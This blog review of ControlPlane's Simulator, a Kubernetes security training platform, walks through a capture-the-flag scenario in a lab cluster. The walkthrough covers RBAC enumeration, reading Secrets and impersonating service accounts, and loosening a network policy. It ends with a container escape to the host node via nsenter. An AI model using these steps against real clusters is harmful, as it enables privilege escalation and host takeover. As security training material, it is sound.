Review of Simulator – a platform for training Kubernetes security engineers using CTF scenarios

Hi all! This is Dmitry Silkin, DevOps engineer at Flant. We have previously reviewed tools for assessing the security of a Kubernetes cluster. But what if we need to teach engineers the basics of Kubernetes security using real-life examples and streamline the learning process? Recently ControlPlane, a company specializing in Cloud Native solutions, made Simulator publicly available. It is a tool for training engineers to find vulnerabilities in Kubernetes. We at Flant decided to test this simulator and understand how promising and useful it is.

In this article I will tell you why this tool is needed, how to configure and install it, and also analyze its capabilities. To do this, I will solve one of the scenarios that Simulator offers. At the end of the review, I will leave my opinion about the tool and talk about the immediate plans of its authors.

What is Simulator and why is it needed?

Simulator was designed as a hands-on way to introduce engineers to container and Kubernetes security. In other words, it is a tool for training engineers to deal with vulnerabilities in Kubernetes. The authors of Simulator themselves name the KataCoda project as the closest analogue, but that platform has since been shut down. There is also a similar tool, kube_security_lab, but it is hardly being developed anymore.

Simulator deploys a ready-made Kubernetes cluster in your AWS account, runs scripts that misconfigure it or make it vulnerable, and trains you to fix those vulnerabilities. The training takes the form of scenarios of varying complexity in Capture the Flag format, in which the engineer needs to collect a certain number of flags to complete the task. There are currently nine scenarios, developed for the Cloud Native Computing Foundation (CNCF). You can also create your own scenario by describing it as an Ansible Playbook.

The scenarios are designed to ensure that standard security controls are configured properly. This basic Kubernetes configuration must be done before application developers get access to the system. The tool was therefore created primarily for security engineers who protect their platform. It will also be useful to other specialists concerned with application security on Kubernetes: DevSecOps engineers, application developers, and so on.

How to use Simulator

Let's analyze the work of Simulator in the following stages:

setup and installation;

infrastructure deployment;

scenario selection;

playing the scenario;

removal of the created infrastructure.

Setup and installation

All work happens in AWS, so we will need a cloud account. First, download the current version of Simulator and perform the following actions in our AWS account:

Create a separate user for test purposes, controlplaneio-simulator.

Assign the created user the AWS IAM permissions specified in the documentation.

Create a key pair, AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY, and save it, since Simulator will use it later.

Set up a Default VPC in the cloud. If you don't do this, Simulator will crash when deploying the infrastructure.

Now you can create a configuration file for the Simulator. For minimal setup, you need to specify the name of the S3 bucket in which Terraform-state will be stored. Our bucket will be called simulator-terraform-state:

simulator config --bucket simulator-terraform-state

By default the configuration will appear in $HOME/.simulator.

Next we will do the following:

We will indicate the region and previously saved keys so that Simulator has access to the AWS account.

Let's create an S3 bucket.

Let's download the necessary containers (for this, Docker must be pre-installed on our machine).

Let's create AMI images of virtual machines, on the basis of which Simulator will deploy a Kubernetes cluster.

export AWS_REGION=eu-central-1

export AWS_ACCESS_KEY_ID=<ID>

export AWS_SECRET_ACCESS_KEY=<KEY>

simulator bucket create

simulator container pull

simulator ami build bastion

simulator ami build k8s
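Since every command above depends on the three exported variables, it can be convenient to check them first. Below is a minimal sketch of such a check. The missing_env function is our own hypothetical helper, not part of Simulator:

```shell
# Hypothetical helper (not part of Simulator): print the names of the
# given environment variables that are unset or empty.
missing_env() {
  missing=""
  for name in "$@"; do
    # Read the value of the variable whose name is stored in $name.
    eval "value=\${$name:-}"
    if [ -z "$value" ]; then
      missing="${missing:+$missing }$name"
    fi
  done
  echo "$missing"
  # Succeed only if nothing is missing.
  [ -z "$missing" ]
}

# Usage: stop before calling simulator if something is not set.
# missing_env AWS_REGION AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY || exit 1
```

The function only inspects the environment and does not contact AWS, so it will not catch wrong or expired keys.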

Infrastructure deployment

You can now deploy infrastructure to run scripts. This will take about five minutes:

simulator infra create

The Kubernetes cluster is ready. The following virtual machines have appeared in AWS:

Scenario selection

Let's look at the available scenarios using the command simulator scenario list:

We will see a table of the available scenarios. It lists the ID, name, description, category and difficulty of each scenario. There are currently three difficulty levels:

Easy. Hints appear as the tasks progress, and the engineer only needs basic knowledge of the core Kubernetes entities.

Medium. Tasks involve entities such as Pod Security Admission, Kyverno and Cilium.

Complex. Very little introductory information is given, and in-depth knowledge of both Kubernetes and related technologies is required: some scenarios use Dex, Elasticsearch, Fluent Bit, etc.

Playing the scenario

To understand how Simulator works, let's take one simple CTF scenario as an example: Seven Seas. To install it, enter the following command, substituting the scenario ID:

simulator install seven-seas

When the installation is complete, you need to connect to the cluster as a user:

cd /opt/simulator/player

ssh -F simulator_config bastion

When you log in, you will receive a welcome message:

When running a scenario, we need to figure out what resources we have access to and what we should be looking for. Let's start by searching the file system. Interestingly, there is a home directory for the user swashbyter. Let's see what's in it:

$ ls /home

swashbyter

$ cd /home/swashbyter

$ ls -alh

total 40K

drwxr-xr-x 1 swashbyter swashbyter 4.0K Feb 18 08:53 .

drwxr-xr-x 1 root root 4.0K Aug 23 07:55 ..

-rw-r--r-- 1 swashbyter swashbyter 220 Aug 5 2023 .bash_logout

-rw-r--r-- 1 swashbyter swashbyter 3.5K Aug 5 2023 .bashrc

drwxr-x--- 3 swashbyter swashbyter 4.0K Feb 18 08:53 .kube

-rw-r--r-- 1 swashbyter swashbyter 807 Aug 5 2023 .profile

-rw-rw---- 1 swashbyter swashbyter 800 Aug 18 2023 diary.md

-rw-rw---- 1 swashbyter swashbyter 624 Aug 18 2023 treasure-map-1

-rw-rw---- 1 swashbyter swashbyter 587 Aug 18 2023 treasure-map-7

Three files caught our attention here: diary.md, treasure-map-1 and treasure-map-7. Let's look at the contents of diary.md:

This file contains the task. We need to find the missing treasure-map fragments, from the second to the sixth. It turns out that treasure-map is a Base64-encoded private SSH key. The task is complete once we collect all the remaining fragments in the cluster, use the key to connect to Royal Fortune, and find the flag there. We also have a hint showing the path we need to follow:

On this map there are namespaces that we must go through to collect all the fragments.

Let's decode the fragment that we have. Let's make sure that it actually stores part of the key:
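A minimal sketch of such a check, assuming the fragment file contains plain Base64 text, as the diary suggests. The peek_fragment function is our own hypothetical helper. It decodes the file and prints only the first line of the result, so the rest of the key material stays off the screen:

```shell
# Hypothetical helper: decode a Base64-encoded file and print only
# the first line of the decoded text.
peek_fragment() {
  base64 -d < "$1" | head -n 1
}

# Usage in the home directory from the listing above:
# peek_fragment treasure-map-1
```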

Let's move on. Judging by the output of printenv, we are in a container:

$ printenv

KUBERNETES_PORT=tcp://10.96.0.1:443

KUBERNETES_SERVICE_PORT=443

THE_WAY_PORT_80_TCP=tcp://10.105.241.164:80

HOSTNAME=fancy

HOME=/home/swashbyter

OLDPWD=/

THE_WAY_SERVICE_HOST=10.105.241.164

TERM=xterm

KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

KUBERNETES_PORT_443_TCP_PORT=443

KUBERNETES_PORT_443_TCP_PROTO=tcp

THE_WAY_SERVICE_PORT=80

THE_WAY_PORT=tcp://10.105.241.164:80

THE_WAY_PORT_80_TCP_ADDR=10.105.241.164

KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443

KUBERNETES_SERVICE_PORT_HTTPS=443

KUBERNETES_SERVICE_HOST=10.96.0.1

THE_WAY_PORT_80_TCP_PORT=80

PWD=/home/swashbyter

THE_WAY_PORT_80_TCP_PROTO=tcp

Let's try to get a list of pods in the current namespace:

$ kubectl get pods

Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:arctic:swashbyter" cannot list resource "pods" in API group "" in the namespace "arctic"

We don't have the rights to do this, but we have learned that the swashbyter service account lives in the arctic namespace, where our journey begins. Let's see what rights we have in this namespace:

$ kubectl auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get list]

Interestingly, the only resource we are allowed to view is the list of namespaces in the cluster:

$ kubectl get ns

NAME STATUS AGE

arctic Active 51m

default Active 65m

indian Active 51m

kube-node-lease Active 65m

kube-public Active 65m

kube-system Active 65m

kyverno Active 51m

north-atlantic Active 51m

north-pacific Active 51m

south-atlantic Active 51m

south-pacific Active 51m

southern Active 51m

Let's run the auth can-i --list command in the north-atlantic namespace, since it is next on the path. Perhaps we have additional rights there:

$ kubectl auth can-i --list -n north-atlantic

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get list]

secrets [] [] [get list]

Here we have the rights to view Secrets. One of them contains treasure-map-2:

$ kubectl get secrets -n north-atlantic

NAME TYPE DATA AGE

treasure-map-2 Opaque 1 59m

$ kubectl get secrets -n north-atlantic treasure-map-2 -o yaml

apiVersion: v1

data:

treasure-map-2: VHlSWU1OMzRaSkEvSDlBTk4wQkZHVTFjSXNvSFYwWGpzanVSZi83V0duY2tWY1lBcTNMbzBCL0ZaVFFGWm41Tk1OenE5UQplejdvZ1RyMmNLalNXNVh5VlBsdmdnc0Q5dHJ4ZkFoOSttNEN3cWpBMWN0c1RBVG1pQUZxVzJxNU1KSG51bXNrSGZBUzFvCkY5RWF3ZEExNkJQRFF3U3Rma2pkYS9rQjNyQWhDNWUrYlFJcUZydkFpeFUramh3c2RRVS9MVitpWjZYUmJybjBUL20wZTQKUytGT2t6bDhUTkZkOTFuK01BRFd3dktzTmd6TXFWZkwwL1NXRGlzaXM0U2g1NFpkYXB0VVM2MG5rTUlnWDNzUDY1VUZYRQpESWpVSjkzY1F2ZkxZMFc0ZWVIcllhYzJTWjRqOEtlU0g4d2ZsVFVveTg4T2NGbDdmM0pQM29KMU1WVkZWckg4TDZpTlNMCmNBQUFkSXp5cWlVczhxb2xJQUFBQUhjM05vTFhKellRQUFBZ0VBc05vd1A4amxGZUIrUUEzTGY1bkREa3pBODA5OW9PTzIKOGU3bEdlVHNrNjFtRGpRa3JIc1FneGt4YjBRcEJVTW9leGl2Y3BLWGt3bStuU0x4YmpVbjVJVzhURlloL3lneWtXOFViTQ==

kind: Secret

metadata:

creationTimestamp: "2024-02-18T08:50:11Z"

name: treasure-map-2

namespace: north-atlantic

resourceVersion: "1973"

uid: f2955e2a-47a7-4f99-98db-0acff328cd7f

type: Opaque

Let's save it, we'll need it later.
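Instead of copying the value out of the YAML by hand, it can be extracted and decoded in one step. The sketch below is one possible way to do it. The secret_value function and the KUBECTL override are our own hypothetical additions, and the output file name in the usage line is arbitrary:

```shell
# KUBECTL can be overridden (for example in tests); by default the
# real kubectl binary is used.
KUBECTL="${KUBECTL:-kubectl}"

# Hypothetical helper: print the decoded value of one key of a Secret.
# Arguments: namespace, Secret name, key inside .data.
secret_value() {
  "$KUBECTL" get secret "$2" -n "$1" -o "jsonpath={.data.$3}" | base64 -d
}

# Usage with the Secret from this step:
# secret_value north-atlantic treasure-map-2 treasure-map-2 > treasure-map-2
```

Values under .data in a Secret are always Base64-encoded by Kubernetes, which is why the output is piped through base64 -d.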

Let's move on. Now let's look at the available rights in the namespace south-atlantic:

$ kubectl auth can-i --list -n south-atlantic

Resources Non-Resource URLs Resource Names Verbs

pods/exec [] [] [create delete get list patch update watch]

pods [] [] [create delete get list patch update watch]

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get list]

serviceaccounts [] [] [get list]

Here we have rights to view, create and manage pods, as well as to read service accounts. Let's check which pods and service accounts exist:

$ kubectl get pods -n south-atlantic

No resources found in south-atlantic namespace.

$ kubectl get sa -n south-atlantic

NAME SECRETS AGE

default 0 63m

invader 0 63m

There are no pods in the namespace, but there is a service account named invader. Let's try to create a pod in this namespace that runs under this service account. We'll take the kubectl image from the repository of the tool's developers. Let's describe the manifest and apply it:

apiVersion: v1
kind: Pod
metadata:
  name: invader
  namespace: south-atlantic
spec:
  serviceAccountName: invader
  containers:
  - image: docker.io/controlplaneoffsec/kubectl:latest
    command: ["sleep", "2d"]
    name: tools
    imagePullPolicy: IfNotPresent
    securityContext:
      allowPrivilegeEscalation: false

Let's exec into the container and see what is in its file system:

kubectl exec -it -n south-atlantic invader sh

Defaulted container "blockade-ship" out of: blockade-ship, tools

/ # ls

bin dev home media opt root sbin sys usr

contraband etc lib mnt proc run srv tmp var

The contraband folder looks interesting. Let's check what's in it:

/ # ls contraband/

treasure-map-3

/ # cat contraband/treasure-map-3

The third fragment is there, so let's save it. Along with blockade-ship, the pod also has the tools container. Let's get into it. It has the kubectl utility, and we know that the next stop on the route is the southern namespace. Let's check our rights there:

$ kubectl exec -it -n south-atlantic invader -c tools bash

root@invader:~# kubectl auth can-i --list -n southern

Resources Non-Resource URLs Resource Names Verbs

pods/exec [] [] [create]

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

pods [] [] [get list]

The rights are roughly the same as in the previous namespace, so we list the pods in the namespace and exec into one of them. Then we search its file system for a map fragment. The search turns up the /mnt/.cache directory. Let's look for the fourth fragment in it. Here it is, so let's save it:

root@invader:~# kubectl exec -it -n southern whydah-galley bash

root@whydah-galley:/# ls -alh /mnt

total 12K

drwxr-xr-x 3 root root 4.0K Feb 18 08:50 .

drwxr-xr-x 1 root root 4.0K Feb 18 08:50 ..

drwxr-xr-x 13 root root 4.0K Feb 18 08:50 .cache

root@whydah-galley:~# cd /mnt/.cache/

root@whydah-galley:/mnt/.cache# ls -alhR | grep treasur

-rw-r--r-- 1 root root 665 Feb 18 08:50 treasure-map-4

-rw-r--r-- 1 root root 89 Feb 18 08:50 treasure-chest

The next stop is indian. Let's see what permissions we have there:

root@whydah-galley:/mnt/.cache# kubectl auth can-i --list -n indian

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

networkpolicies.networking.k8s.io [] [] [get list patch update]

configmaps [] [] [get list]

namespaces [] [] [get list]

pods [] [] [get list]

services [] [] [get list]

pods/log [] [] [get]

In indian we can view configmaps and even pod logs. Let's follow the familiar routine: first check which pods are running in the namespace, then look at the pod logs, the services, and the contents of the configmaps:

root@whydah-galley:/mnt/.cache# kubectl get pods -n indian

NAME READY STATUS RESTARTS AGE

adventure-galley 1/1 Running 0 114m

root@whydah-galley:/mnt/.cache# kubectl logs -n indian adventure-galley

2024/02/18 08:51:08 starting server on :8080

root@whydah-galley:/mnt/.cache# kubectl get svc -n indian

NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE

crack-in-hull ClusterIP 10.99.74.124 <none> 8080/TCP 115m

root@whydah-galley:/mnt/.cache# kubectl get cm -n indian options -o yaml

apiVersion: v1

data:

action: |

- "use"

- "fire"

- "launch"

- "throw"

object: |

- "digital-parrot-clutching-a-cursed-usb"

- "rubber-chicken-with-a-pulley-in-the-middle"

- "cyber-trojan-cracking-cannonball"

- "hashjack-hypertext-harpoon"

kind: ConfigMap

root@whydah-galley:/mnt/.cache# curl -v crack-in-hull.indian.svc.cluster.local:8080

* processing: crack-in-hull.indian.svc.cluster.local:8080

* Trying 10.99.74.124:8080...

It's not yet clear what to do with the contents of the configmap, so let's move on. We can see that the server is listening on port 8080, but for some reason we get no response when we access the service. Maybe there are rules restricting access to this port?

root@whydah-galley:/mnt/.cache# kubectl get networkpolicies -n indian

NAME POD-SELECTOR AGE

blockade ship=adventure-galley 116m

root@whydah-galley:/mnt/.cache# kubectl get networkpolicies -n indian blockade -o yaml

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  creationTimestamp: "2024-02-18T08:50:15Z"
  generation: 1
  name: blockade
  namespace: indian
  resourceVersion: "2034"
  uid: 9c97e41c-6f77-4666-a3f3-39112f502f84
spec:
  ingress:
  - from:
    - podSelector: {}
  podSelector:
    matchLabels:
      ship: adventure-galley
  policyTypes:
  - Ingress

Yes, there is a restricting rule here. For pods labeled ship: adventure-galley it allows incoming connections only from pods in the same namespace, so requests from our pod in southern are dropped. Therefore, we need to allow incoming traffic from anywhere:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  creationTimestamp: "2024-02-18T08:50:15Z"
  generation: 3
  name: blockade
  namespace: indian
  resourceVersion: "20773"
  uid: 9c97e41c-6f77-4666-a3f3-39112f502f84
spec:
  ingress:
  - {}
  podSelector:
    matchLabels:
      ship: adventure-galley
  policyTypes:
  - Ingress

Now the server gives us an HTML page on port 8080:

root@whydah-galley:/mnt/.cache# curl crack-in-hull.indian.svc.cluster.local:8080

<!DOCTYPE html>

<html>

<head>

<h3>Adventure Galley</h3>

<meta charset="UTF-8" />

</head>

<body>

<p>You see a weakness in the Adventure Galley. Perform an Action with an Object to reduce the pirate ship to Logs.</p>

<div>

<form method="POST" action="/">

<input type="text" id="Action" name="a" placeholder="Action"><br>

<input type="text" id="Object" name="o" placeholder="Object"><br>

<button>Enter</button>

</form>

</div>

</body>

</html>

The server invites us to send POST requests in the form of action-object pairs. Some of these pairs will eventually cause new messages to appear in the application log. This is where the contents of the configmap obtained in one of the previous steps come in handy:

apiVersion: v1

data:

action: |

- "use"

- "fire"

- "launch"

- "throw"

object: |

- "digital-parrot-clutching-a-cursed-usb"

- "rubber-chicken-with-a-pulley-in-the-middle"

- "cyber-trojan-cracking-cannonball"

- "hashjack-hypertext-harpoon"

kind: ConfigMap

This configmap lists the objects and the actions that can be performed with them: "use", "fire", "launch" and "throw".

Let's try to apply each action to each object using a bash script:

root@whydah-galley:/mnt/.cache# A=("use" "fire" "launch" "throw"); O=("digital-parrot-clutching-a-cursed-usb" "rubber-chicken-with-a-pulley-in-the-middle" "cyber-trojan-cracking-cannonball" "hashjack-hypertext-harpoon"); for a in "${A[@]}"; do for o in "${O[@]}"; do curl -X POST -d "a=${a}&o=${o}" http://crack-in-hull.indian.svc.cluster.local:8080/; done; done

NO EFFECT

NO EFFECT

NO EFFECT

NO EFFECT

NO EFFECT

NO EFFECT

NO EFFECT

NO EFFECT

NO EFFECT

NO EFFECT

DIRECT HIT! It looks like something fell out of the hold.

NO EFFECT

NO EFFECT

NO EFFECT

NO EFFECT

NO EFFECT

For each POST request, the adventure-galley web server reported how "effective" the request was. All requests except one had no effect. Maybe the application wrote something to its log? Let's take a look:

root@whydah-galley:/mnt/.cache# kubectl logs -n indian adventure-galley

2024/02/18 08:51:08 starting server on :8080

2024/02/18 10:58:36 treasure-map-5: qm9IZskNawm5JCxuntCHg2...

adventure-galley gave us the fifth fragment of the map. The last region with a fragment is south-pacific. As always, let's first check the permissions in this namespace:

root@whydah-galley:/mnt/.cache# kubectl auth can-i --list -n south-pacific

Resources Non-Resource URLs Resource Names Verbs

pods/exec [] [] [create]

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

deployments.apps [] [] [get list create patch update delete]

namespaces [] [] [get list]

pods [] [] [get list]

serviceaccounts [] [] [get list]

Here is something interesting: we have rights to manage the Deployment lifecycle. Let's check which service account exists in this namespace and launch a Deployment under it:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: invader
  labels:
    app: invader
  namespace: south-pacific
spec:
  selector:
    matchLabels:
      app: invader
  replicas: 1
  template:
    metadata:
      labels:
        app: invader
    spec:
      serviceAccountName: port-finder
      containers:
      - name: invader
        image: docker.io/controlplaneoffsec/kubectl:latest
        command: ["sleep", "2d"]
        imagePullPolicy: IfNotPresent

Let's try to create the Deployment from the manifest. The Deployment object itself was created, but this time its pod did not start because the manifest violates the Pod Security Standards policy:

root@whydah-galley:~# kubectl apply -f deploy.yaml

Warning: would violate PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "invader" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "invader" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "invader" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "invader" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")

deployment.apps/invader created

root@whydah-galley:~# kubectl get deployments -n south-pacific

NAME READY UP-TO-DATE AVAILABLE AGE

invader 0/1 0 0 2m33s

Let's add the required securityContext settings and seccomp profile to the manifest and apply it again.

Looking ahead

The image used in the last step must have kubectl, jq and ssh installed. Since the container will run as an unprivileged user, there will be no way to install them manually.
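A quick way to confirm that a candidate image meets this requirement is to check for the tools from inside it. The sketch below is only an illustration, and missing_tools is our own hypothetical helper:

```shell
# Hypothetical helper: print the name of every given command that
# cannot be found on PATH.
missing_tools() {
  for tool in "$@"; do
    command -v "$tool" >/dev/null 2>&1 || echo "$tool"
  done
}

# Usage inside the candidate image; empty output means everything is there.
# missing_tools kubectl jq ssh
```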

The security warnings are gone, and invader has started:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: invader
  labels:
    app: invader
  namespace: south-pacific
spec:
  selector:
    matchLabels:
      app: invader
  replicas: 1
  template:
    metadata:
      labels:
        app: invader
    spec:
      serviceAccountName: port-finder
      securityContext:
        seccompProfile:
          type: RuntimeDefault
      containers:
      - name: invader
        image: lawellet/simulator-invader:1.0.0
        command: ["sleep", "2d"]
        imagePullPolicy: IfNotPresent
        securityContext:
          allowPrivilegeEscalation: false
          capabilities:
            drop:
            - "ALL"
          runAsNonRoot: true
          runAsUser: 1000
          runAsGroup: 2000

root@whydah-galley:~# kubectl get pods -n south-pacific

NAME READY STATUS RESTARTS AGE

invader-7db84dccd4-5m6g2 1/1 Running 0 29s

Let's get into the container and check what rights its service account has in the south-pacific namespace:

root@whydah-galley:~# kubectl exec -it -n south-pacific invader-7db84dccd4-5m6g2 bash

swashbyter@invader-7db84dccd4-5m6g2:/root$ kubectl auth can-i --list -n south-pacific

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

secrets [] [] [get list]

Let's look at the Secrets: there is treasure-map-6, the last missing fragment:

swashbyter@invader-7db84dccd4-5m6g2:/root$ kubectl get secrets -n south-pacific

NAME TYPE DATA AGE

treasure-map-6 Opaque 1 178m

swashbyter@invader-7db84dccd4-5m6g2:/root$ kubectl get secrets -n south-pacific treasure-map-6 -o yaml

apiVersion: v1

data:

treasure-map-6: c05iTlViNmxm…

Let's save the last fragment and combine the previously found parts of the map into one file.
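Combining the parts can be sketched roughly as follows. This assumes that every fragment has already been saved, in decoded form, as treasure-map-1 through treasure-map-7 in one directory. The assemble_key function and the output file name are our own hypothetical choices:

```shell
# Hypothetical helper: concatenate fragment files treasure-map-1..N
# from a directory, in numeric order, into one key file.
# Arguments: directory, number of fragments, output file.
assemble_key() {
  dir="$1"; count="$2"; out="$3"
  : > "$out"          # start from an empty output file
  chmod 600 "$out"    # ssh rejects private keys readable by other users
  i=1
  while [ "$i" -le "$count" ]; do
    cat "$dir/treasure-map-$i" >> "$out" || return 1
    i=$((i + 1))
  done
}

# Usage (file name is an assumption):
# assemble_key . 7 ./royal-fortune-key
```

The function stops with a non-zero status as soon as a fragment is missing, so an incomplete key is easy to notice.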

The last point on our journey is north-pacific. We check the rights to the namespace of the same name:

swashbyter@invader-7db84dccd4-5m6g2:/root$ kubectl auth can-i --list -n north-pacific

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

services [] [] [get list]

It seems that we need to log into the server via SSH using the key collected in the previous steps:

swashbyter@invader-7db84dccd4-5m6g2:/root$ kubectl get svc -n north-pacific

NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE

plot-a-course ClusterIP 10.111.116.224 <none> 22/TCP 3h10m

We write the assembled key to a file in this container and use it to connect to the target machine:



Now all that remains is to find the flag. First, let's check whether we are in a container. Let's look at the list of processes:

Judging by the fact that we can see processes running on the host, we are in a privileged container. Let's now look at the Linux capabilities available to the container (after installing capsh):

root@royal-fortune:/# apt update && apt-get install -y libcap2-bin

root@royal-fortune:~# capsh --print

Current: =ep

Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore

Ambient set =

Current IAB:

Securebits: 00/0x0/1'b0

secure-noroot: no (unlocked)

secure-no-suid-fixup: no (unlocked)

secure-keep-caps: no (unlocked)

secure-no-ambient-raise: no (unlocked)

uid=0(root) euid=0(root)

gid=0(root)

groups=0(root)

Guessed mode: UNCERTAIN (0)

Our process has all possible Linux capabilities. This means we can try to enter the host's namespaces through PID 1:

root@royal-fortune:~# nsenter -t 1 -i -u -n -m bash

root@master-1:/#
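As a side note, the capability check does not strictly require installing capsh: the kernel exposes the effective capability mask in the CapEff line of /proc/<pid>/status. The sketch below tests a single bit of such a mask. The has_cap function is our own hypothetical helper, and 21 is the number of CAP_SYS_ADMIN in linux/capability.h:

```shell
# Hypothetical helper: succeed if capability number $2 is set in the
# hexadecimal mask $1 (the format used by CapEff in /proc/<pid>/status).
has_cap() {
  [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

# Usage inside the container:
# has_cap "$(awk '/^CapEff:/ {print $2}' /proc/self/status)" 21 && echo "CAP_SYS_ADMIN present"
```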

And so we ended up on the node. This is where our final flag is located. Scenario completed:

root@master-1:/# ls -al /root

total 32

drwx------ 4 root root 4096 Feb 18 12:58 .

drwxr-xr-x 19 root root 4096 Feb 18 08:33 ..

-rw------- 1 root root 72 Feb 18 12:58 .bash_history

-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc

-rw-r--r-- 1 root root 161 Jul 9 2019 .profile

drwx------ 2 root root 4096 Feb 15 15:47 .ssh

-rw-r--r-- 1 root root 41 Feb 18 08:50 flag.txt

drwx------ 4 root root 4096 Feb 15 15:48 snap

root@master-1:/# cat /root/flag.txt

flag_ctf{TOTAL_MASTERY_OF_THE_SEVEN_SEAS}

During the tasks we worked with the following Kubernetes entities:

Kubernetes Secrets;

container images;

Pod Security Standards;

network policy;

pod logs;

service accounts;

RBAC;

sidecar containers.

The analyzed scenario clearly shows that granting service accounts more rights than the application needs, combined with running privileged containers, can let an attacker escape from the container and end up on the host.
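The same command we relied on throughout the scenario can also be used defensively, to review what a given identity is allowed to do in each namespace. A minimal sketch follows. The list_rights function and the KUBECTL override are our own hypothetical additions:

```shell
# KUBECTL can be overridden (for example in tests); by default the
# real kubectl binary is used.
KUBECTL="${KUBECTL:-kubectl}"

# Hypothetical helper: for every namespace given, print a header and
# the permissions of the current identity in that namespace.
list_rights() {
  for ns in "$@"; do
    echo "== $ns =="
    "$KUBECTL" auth can-i --list -n "$ns"
  done
}

# Usage with the namespaces from this scenario:
# list_rights arctic north-atlantic south-atlantic southern indian south-pacific north-pacific
```

Running it under each service account makes excessive grants, such as pods/exec or write access to network policies, easier to spot.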

Deleting the created infrastructure

All that remains is to delete the created infrastructure:

simulator infra destroy

This command will remove the virtual machines on which the Kubernetes cluster was deployed.

If we don’t plan to use Simulator anymore, we also need to delete AMI images and the bucket with terraform-state:

simulator ami delete bastion

simulator ami delete simulator-master

simulator ami delete simulator-internal

simulator bucket delete simulator-terraform-state

Results

ControlPlane's Simulator is a relatively new tool, and its creators have big plans. In the future, they want to implement even more CTF scenarios, add the ability to deploy the necessary infrastructure locally using kind, and also develop the interactivity of the learning process: multiplayer, saving player activity, leaderboards, and so on.

We found this platform very interesting and promising for learning all kinds of exploits and vulnerabilities in the Kubernetes cluster, and we will definitely follow its development.
